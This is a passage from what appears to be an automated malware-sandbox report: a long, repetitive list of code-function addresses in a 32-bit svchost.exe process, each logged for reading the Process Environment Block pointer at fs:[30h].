          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]1_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]1_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]1_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]1_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]1_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]1_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]1_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
